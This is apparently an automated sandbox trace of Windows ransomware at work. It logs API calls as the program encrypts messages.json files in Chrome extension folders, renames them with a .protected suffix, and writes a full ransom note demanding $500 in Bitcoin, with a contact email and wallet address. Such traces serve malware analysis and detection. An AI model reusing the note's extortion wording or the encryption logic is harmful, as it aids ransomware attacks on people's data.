returned 1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0080.514] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr") returned 141 [0080.514] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0080.514] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0080.514] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\*") returned 143 [0080.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.514] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.514] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.514] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.514] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.514] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.514] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\.") returned 143 [0080.514] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.514] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.514] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.514] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.515] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.515] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.515] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.515] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\..") returned 144 [0080.515] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.515] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.515] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.515] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.515] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0080.515] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.515] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.515] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.515] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0080.515] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0080.515] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.515] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json") returned 155 [0080.515] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.515] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc8, lpOverlapped=0x0) returned 1 [0080.516] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.516] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc8, lpOverlapped=0x0) returned 1 [0080.516] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.516] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.516] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.516] CloseHandle (hObject=0x168) returned 1 [0080.516] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.protected") returned 165 [0080.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.protected")) returned 1 [0080.517] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.517] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.517] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\RESTORE_FILES.txt") returned 159 [0080.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.517] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.517] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.518] lstrlenA (lpString="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") returned 684 [0080.518] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.518] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.518] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.519] CloseHandle (hObject=0x164) returned 1 [0080.519] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0080.519] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu") returned 141 [0080.519] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0080.519] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0080.519] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\*") returned 143 [0080.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.519] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.519] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.519] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.519] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.519] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.519] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\.") returned 143 [0080.519] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.519] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.519] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.519] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.519] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.519] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.519] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.520] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\..") returned 144 [0080.520] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.520] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.520] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.520] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0080.520] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.520] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0080.521] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0080.521] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0080.521] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.521] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.522] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.522] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.522] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.522] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.522] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.522] CloseHandle (hObject=0x168) returned 1 [0080.522] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.protected") returned 165 [0080.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.protected")) returned 1 [0080.523] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.523] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.523] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0080.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.523] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.523] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.524] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.524] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.524] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.524] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.524] CloseHandle (hObject=0x164) returned 1 [0080.524] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="Windows") returned -1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="Program Files") returned -1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="Program Files (x86)") returned -1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="$Recycle.bin") returned 1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="System Volume Information") returned -1 [0080.524] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy") returned 141 [0080.524] lstrcmpW (lpString1="hy", lpString2=".") returned 1 [0080.524] lstrcmpW (lpString1="hy", lpString2="..") returned 1 [0080.524] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\*") returned 143 [0080.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.525] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.525] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.525] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.525] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 